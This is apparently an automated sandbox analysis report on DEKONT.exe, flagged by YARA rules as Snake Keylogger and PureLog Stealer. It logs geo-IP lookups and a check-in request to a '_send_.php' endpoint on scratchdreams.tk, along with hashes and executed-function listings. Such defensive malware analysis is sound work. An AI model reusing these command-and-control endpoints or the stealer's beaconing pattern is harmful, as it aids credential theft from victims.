2024-04-24 08:12:13 UTC	710	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10985 Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2OzTkV6XAmG8oy1gI0lTcwMJOUMsgiZ9lCkkLyRYkLNzTxo0jqU8i8cK0A1KIzAVMsnE48%2FlwyEO3HY0NicH8msULkuIubmPl0wfjjd0AzNiMqD%2Be%2FnLknXgwNGWYrB%2BIeuXH%2FC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8794a0871fd62a8b-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:12:13 UTC	368	IN	Data Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
2024-04-24 08:12:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49722	104.21.67.152	443	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:12:14 UTC	86	OUT	GET /xml/154.16.105.36 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-24 08:12:14 UTC	708	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10986 Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNx37ARAyRv4evi4ARv3hhmDBLBJ8kqc3HjijSnkINzUGNpaOmHA4OOnrPwhjG5pX5FvOT5ppYDPf7H28H%2FeXJdAN8NupfzhF094QySZyM0u%2BZCDKdSftI%2FyjE169UblshxSdd%2FR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8794a08fdbb80fc7-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:12:14 UTC	368	IN	Data Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
2024-04-24 08:12:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49724	104.21.67.152	443	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:12:15 UTC	86	OUT	GET /xml/154.16.105.36 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-24 08:12:16 UTC	712	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:12:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10988 Last-Modified: Wed, 24 Apr 2024 05:09:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KaTXTXq%2Fa5ufaw40RrcbpQ%2FxPTOnGj%2BJdHpsc0VqsO8FRVAIlDL08HY2SNh73C7zAdx%2FZCRIJRG8aRfa2dZgK21lOADN1JyK%2FlZgPMorEaPYUVnNwe5fdrD6vLxOopVkr%2BZaEctP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8794a0982d4c2b6e-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:12:16 UTC	368	IN	Data Raw: 31 36 39 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 41 5a 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 41 72 69 7a 6f 6e 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 50 68 6f 65 6e 69 78 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 35 30 30 34 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 3c 2f 54 69 6d Data Ascii: 169<Response><IP>154.16.105.36</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>AZ</RegionCode><RegionName>Arizona</RegionName><City>Phoenix</City><ZipCode>85004</ZipCode><TimeZone>America/Phoenix</Tim
2024-04-24 08:12:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49725	104.21.27.85	443	7564	C:\Users\user\Desktop\DEKONT.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:12:18 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-04-24 08:12:53 UTC	741	IN	HTTP/1.1 522 Date: Wed, 24 Apr 2024 08:12:53 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F9LUlnb3VVT%2FsdKByZOVo8ErDJ%2F8T%2BNnCtILNSIIh96hdHMJ%2FLBaVPdBznafSNxHn6hg0TISN7biQuQn76vksodKvZYZgc%2B5EXuYAP8O%2BqsIoXHjzamHwoGQlrYr9xzVS3ZX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8794a0a73bed1508-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:12:53 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Target ID:	0
Start time:	10:12:00
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\DEKONT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DEKONT.exe"
Imagebase:	0xfe0000
File size:	971'776 bytes
MD5 hash:	384C4DA2B75F4C7A1FA5585BC07634E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1378528073.0000000005B20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1375703382.0000000004409000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1375703382.0000000004DF7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:12:02
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\DEKONT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DEKONT.exe"
Imagebase:	0xc30000
File size:	971'776 bytes
MD5 hash:	384C4DA2B75F4C7A1FA5585BC07634E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.3819808283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3822157482.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.5%
Total number of Nodes:	323
Total number of Limit Nodes:	12

Executed Functions

Function 059A766D Relevance: .7, Instructions: 723COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb73ce6ac8971bfd48281e34e485a7d197ceb501f0e674f7936b31df34a5b7bd
Instruction ID: 40b409d2bdf8a8dc40107342beb724bd8c1c41db5b778e964b3d3f7b35eff829
Opcode Fuzzy Hash: eb73ce6ac8971bfd48281e34e485a7d197ceb501f0e674f7936b31df34a5b7bd
Instruction Fuzzy Hash: 9172E934A40259CFDB25DB64C884FA9B7B2FF89300F5581EAE5096B761DB31AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 059A7684 Relevance: .7, Instructions: 716COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2236c87ed9572a7e76387e72daed6529c59f8c6407a0c4a6dec75a37d8c50ad6
Instruction ID: 2a15ce5ec27ccadf801bb2ac1786e4f8f899a4eaa72e83a7cc12fe3a7b2e5506
Opcode Fuzzy Hash: 2236c87ed9572a7e76387e72daed6529c59f8c6407a0c4a6dec75a37d8c50ad6
Instruction Fuzzy Hash: 3672E934A40259CFDB25DB64C884FA9B7B2FF89300F5581EAE5096B761DB31AE80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 059ABC20 Relevance: .7, Instructions: 714COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1377970006.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59a0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16d31e7232b7683df228bed084610d0b8cdb974434609c72b555bcdce92f630c
Instruction ID: adc78cb84fda056ff4adffebc813b4cfbc3632ad43e8742c4233ea077899b963
Opcode Fuzzy Hash: 16d31e7232b7683df228bed084610d0b8cdb974434609c72b555bcdce92f630c
Instruction Fuzzy Hash: C372E834A40259CFDB25DB64C894FA9B7B2FF89300F5581EAE5096B761DB31AE80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 032A12A0 Relevance: .6, Instructions: 606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1373255583.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 755b49fd7853fd2607f0275574b00714079ea501598afaf699ab850e2e9e775c
Instruction ID: 4f124716e0e88294eaae489a7e97c4841eada4a472cbc7ad1c1f886a1d89253b
Opcode Fuzzy Hash: 755b49fd7853fd2607f0275574b00714079ea501598afaf699ab850e2e9e775c
Instruction Fuzzy Hash: 59329930B11A068FDB18DB79C554BAEB7F6AF89710F288469E14ADB394CB34E841CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05976E40 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6d652e713594d636b1f2e4c00e387d078e3b56db534b5919d5f41f6bb18b44b
Instruction ID: 45a7015fd255763982b760cf2df72fa62ce66d19b8f132585ff5558bb2eb015e
Opcode Fuzzy Hash: a6d652e713594d636b1f2e4c00e387d078e3b56db534b5919d5f41f6bb18b44b
Instruction Fuzzy Hash: CE42B374A002198FDB24DF68C994B9DB7B2FF89300F5181EAD509AB365DB30AE85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05976E31 Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b9e22d95b217f881c8f127261ef4b2f2d2f0e2321890e5ea166c37f355992de
Instruction ID: e16f845533037981879d93fc8f01d2f3543ff4bf7f11392a3830ada9f00f6fc0
Opcode Fuzzy Hash: 8b9e22d95b217f881c8f127261ef4b2f2d2f0e2321890e5ea166c37f355992de
Instruction Fuzzy Hash: 6232A134A012188FDB54DF68C994F99B7B2FF8A300F5181EAD509AB365DB30AE85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 07AB04B8 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581350f2abd43b2679e125fc515224cb298fd21846fa3ced044f0097fc2f2ab3
Instruction ID: eb49ad98485e0b4693feee09b54f9a3a412286c131ae76371407c832e07b89ca
Opcode Fuzzy Hash: 581350f2abd43b2679e125fc515224cb298fd21846fa3ced044f0097fc2f2ab3
Instruction Fuzzy Hash: C891F5B0E15209DFCB18CFA5D5809DEFBB6FB8A300F20A51AE416B7265D7349946CF14

Uniqueness

Uniqueness Score: -1.00%

Function 07AB04A8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff8a2081a20a99481939674a81a0df9dd202fa0c22726c749f894657de01c974
Instruction ID: 77f51234df792e287c6f296fa8db97085599d1ea78d68cab2efbdafaa4b7c40c
Opcode Fuzzy Hash: ff8a2081a20a99481939674a81a0df9dd202fa0c22726c749f894657de01c974
Instruction Fuzzy Hash: 999108B0E15209AFCB18CFE5D5809DEFBB6FB89300F20A51AE416B7265D7349946CF14

Uniqueness

Uniqueness Score: -1.00%

Function 07AB01A0 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 383063beff95c7f720fb85d30bb311b118509be6980c6373e347dff3ae486013
Instruction ID: 88350df24f5d7be1e0418f0851e91da39d6548094c046d05ed699f378a431069
Opcode Fuzzy Hash: 383063beff95c7f720fb85d30bb311b118509be6980c6373e347dff3ae486013
Instruction Fuzzy Hash: 118110B4E14229DFCB14CFA9D9809EEFBB5FB8A300F10955AD421B7264D7349912CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07AB0190 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d40068c9fc42207f3628589f815420e94019a2c09a87324035982d7ccdb7f52
Instruction ID: 0b7344c8729543f54168e47c82391c42d9a856f5ce423bce6f7117e6d4c44ffe
Opcode Fuzzy Hash: 2d40068c9fc42207f3628589f815420e94019a2c09a87324035982d7ccdb7f52
Instruction Fuzzy Hash: 198112B5E10219DFCB14CFA9D980AEEFBB6FB89300F00955AD411A7364E7389916CB54

Uniqueness

Uniqueness Score: -1.00%

Function 07AB1BFD Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e4027841e27329364ce62016e97ff5a0cca76ddf11e9b2a8162656798071dc
Instruction ID: 60e72731f494d396a99dc5adb4ae69f1a9abcc29cbcd67adba2f87f751561e0b
Opcode Fuzzy Hash: 50e4027841e27329364ce62016e97ff5a0cca76ddf11e9b2a8162656798071dc
Instruction Fuzzy Hash: A441A6B4D012089FDB20CFAAC584BDEFBF4BB49300F20942AE418BB251C7759945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 07AB1C08 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ded4f5cf2fade0a27263bf0cbea4fba07912eed5379d1b6475498c7cb642c1
Instruction ID: 8dc01f22faca90207b362d7a81c543bb65d0e2b0842738afb6256e36c55253c6
Opcode Fuzzy Hash: a3ded4f5cf2fade0a27263bf0cbea4fba07912eed5379d1b6475498c7cb642c1
Instruction Fuzzy Hash: 134196B4D0120C9FDB20DFAAD584B9EBBF4BB49700F20942AE418BB251C775A945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 07AB7C38 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b31156d0df27144a224fed240d5873c07a1821d8505a4179fe5b6c9639ef39
Instruction ID: 747dd1c5eb561305422fb94550275d10919c1327bd131640cbe020381122bdab
Opcode Fuzzy Hash: 67b31156d0df27144a224fed240d5873c07a1821d8505a4179fe5b6c9639ef39
Instruction Fuzzy Hash: 9C21F9B1D006189BEB18CFABC8457DEFAFBAFC9300F14C06AD51876264DB7409468F90

Uniqueness

Uniqueness Score: -1.00%

Function 07ABDB4C Relevance: 1.8, APIs: 1, Instructions: 325
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07ABDE1F

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 66cd63a37255357bbd79ed1fae17dd040f804c22ea7fc7f39d5aa68a08d5a34a
Instruction ID: fc22617c2674d13ba74ece4c4197df04acb5617e5fb2cc0dfcb49c200fcb270a
Opcode Fuzzy Hash: 66cd63a37255357bbd79ed1fae17dd040f804c22ea7fc7f39d5aa68a08d5a34a
Instruction Fuzzy Hash: F2C136B1E0022E8FDB24DFA4C840BEDBBB5BF49314F0095A9D459B7240DBB49A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 07ABDB58 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07ABDE1F

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2e590538d49c970e4e76a223d27af0c280e4bd6bd7e8d4e4b12f706bd1f79df7
Instruction ID: f50fa812556211141fb1567aee45b2daa129fe83c3e9709a0af4143636b36843
Opcode Fuzzy Hash: 2e590538d49c970e4e76a223d27af0c280e4bd6bd7e8d4e4b12f706bd1f79df7
Instruction Fuzzy Hash: 7BC137B1E0022E8FDB24DFA4C840BEDBBB5BF49314F0095A9D459B7240DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 017FAF98 Relevance: 1.7, APIs: 1, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(?), ref: 017FB22A

Memory Dump Source

Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3147564a67cfa0fa581f22795031cbc6320173a017a7afb8bf50fadb378c63c3
Instruction ID: f53cdc70b701f9337d9796f9b1d3434cd16a2f9cb803e5e0a444e5015820ffc2
Opcode Fuzzy Hash: 3147564a67cfa0fa581f22795031cbc6320173a017a7afb8bf50fadb378c63c3
Instruction Fuzzy Hash: 4C910170A00B098FDB24DF69D48579AFBF1FF88200F00892EE55AA7750DB75A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05971EC5 Relevance: 1.7, APIs: 1, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05972091

Memory Dump Source

Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b5cbc0a1bdc5c1f25fa81e913621824acf71beb3c5ffaf95324253c0e0c5f412
Instruction ID: 8ca16e3b9bf4e1f830c4f7374830878b4f9793b63bf4667b2a8f2c5d05dd064c
Opcode Fuzzy Hash: b5cbc0a1bdc5c1f25fa81e913621824acf71beb3c5ffaf95324253c0e0c5f412
Instruction Fuzzy Hash: 287189B8D04218DFDF20CFA9D984BDDBBF1BB09300F5491AAE818A7221D7319A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05971ED0 Relevance: 1.7, APIs: 1, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05972091

Memory Dump Source

Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f99eb730ab3af5bc7623daa2dcee40c3e7d78028144808c6e4f8cd7a8eea8bd1
Instruction ID: 30fd41fc4388bc3df7ba084e834242aaeb27815a6cb68cb915b059d5394bb7e9
Opcode Fuzzy Hash: f99eb730ab3af5bc7623daa2dcee40c3e7d78028144808c6e4f8cd7a8eea8bd1
Instruction Fuzzy Hash: 44718AB4D04218DFDF20CFA9C984BDDBBF1BB09310F1091AAE818A7211D771AA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 017F5E22 Relevance: 1.6, APIs: 1, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017F5F59

Memory Dump Source

Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: aad53335ee6cf25645549d88323358b0957d91239e4e876a19f056f3ba26c975
Instruction ID: 76c50dfe0efe8b14f96b6983371da3007ef241d15ec96d76a830563a711d016a
Opcode Fuzzy Hash: aad53335ee6cf25645549d88323358b0957d91239e4e876a19f056f3ba26c975
